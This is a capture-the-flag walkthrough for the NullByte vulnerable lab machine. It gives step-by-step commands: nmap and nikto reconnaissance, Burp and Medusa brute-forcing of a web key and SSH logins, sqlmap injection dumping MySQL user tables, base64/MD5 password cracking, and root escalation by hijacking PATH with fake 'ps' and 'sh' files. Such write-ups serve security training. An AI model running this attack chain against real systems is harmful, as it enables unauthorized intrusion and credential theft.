Null-Byte Report
- Find the blackbox with arp-scan 172.16.0.0/16, add it to scope in burp, run spider in burp and start scanning with nmap and nikto.
- nmap –p- -sV 172.16.0.13
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
777/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
50927/tcp open status 1 (RPC #100024)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
- port 22 is forwarded to 777 instead.
- nikto –h 172.16.0.13
Server: Apache/2.4.10 (Debian)
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ ETag header found on server, fields: 0xc4 0x51c42a5c32a70
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 6456 items checked: 0 error(s) and 4 item(s) reported on remote host
- try to find more information, as I know we can hide strings inside pictures. Download the picture and open it with strings main.gif
at the first line there is a string: kzMb5nVYJw
try to add it to the url: http://172.16.0.13/kzMb5nVYJw
Checking the source of this page:
<center>
<form method="post" action="index.php">
Key:<br>
<input type="password" name="key">
</form>
</center>
<!-- this form isn't connected to mysql, password ain't that complex --!>
- After several hints, there is no option to find the password.
find the page in burp, send it to intruder or CTRL + I
add a payload like rockyou or crackstation passwords.
and run attack.
We can use hydra/medusa also to run this brute force attack.
Success!! The password is elite:
Continue without a username and click enter:
We have 2 users: isis and ramses
- Now, we have 2 options: hack them with brute force or using sqlmap.
- Medusa:
medusa -u isis -P rockyou.txt -h 172.16.0.13 -M ssh -n 777
medusa -u ramses -P rockyou.txt -h 172.16.0.13 -M ssh -n 777 - Hydra:
- Sqlmap:
sqlmap -u http://172.16.0.13/kzMb5nVYJw/420search.php?usrtosearch= --dbs
Check mysql database:
sqlmap –u http://172.16.0.13/kzMb5nVYJw/420search.php?usrtosearch= --batch --dump -C User,Password -T user -D mysql
sqlmap –u http://172.16.0.13/kzMb5nVYJw/420search.php?usrtosearch= --batch --dump -C User,Password -T user -D mysql
Check the application:
Check seth database:
sqlmap -u http://172.16.0.13/kzMb5nVYJw/420search.php?usrtosearch=1 --dump --columns --tables -D seth
The code: YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE= is base64 let decode it with:
echo YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE= |base64 –d
the result is: c6d6bd7ebf806f43c76acc3681703b81
echo YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE= |base64 –d
the result is: c6d6bd7ebf806f43c76acc3681703b81
Check this MD5 hash with john, hashcat or crackstation, the password is:
omega
omega
Logged in!
- ramses@NullByte:~$ ls -lha
drwxr-xr-x 2 ramses ramses 4.0K Aug 2 2015 .
drwxr-xr-x 5 root root 4.0K Aug 2 2015 ..
-rw------- 1 ramses ramses 96 Aug 2 2015 .bash_history
-rw-r--r-- 1 ramses ramses 220 Aug 2 2015 .bash_logout
-rw-r--r-- 1 ramses ramses 3.5K Aug 2 2015 .bashrc
-rw-r--r-- 1 ramses ramses 675 Aug 2 2015 .profile
Check all the files content, we have valued information in .bash_history
su eric
su eric
exit
ls
clear
cd /var/www
cd backup/
ls
./procwatch
clear
sudo -s
cd /
ls
exit
cd to /var/www/backup and check what procwatch is?
Procwatch is security monitor written in Perl that watches a /proc filesystem for new processes. When a process is created, procwatch reports the time, the username, the PID, and the binary that was run. Its output is suitable for logging to log files and is geared for system administrators who are testing a new but as yet untrusted UNIX system.
Procwatch is root owned that mean the file is running with root priviliges.
Run procwatch we can see its running sh and ps.
Create a new ps file echo /bin/sh > ps
chmod +x ps
chmod +x ps
Create a new sh file echo /bin/sh > sh
chmod +x sh
chmod +x sh
set path to:
export PATH=/var/www/backup:${PATH}
run procwatch:
Yess! Root!!
At /root there is a proof file: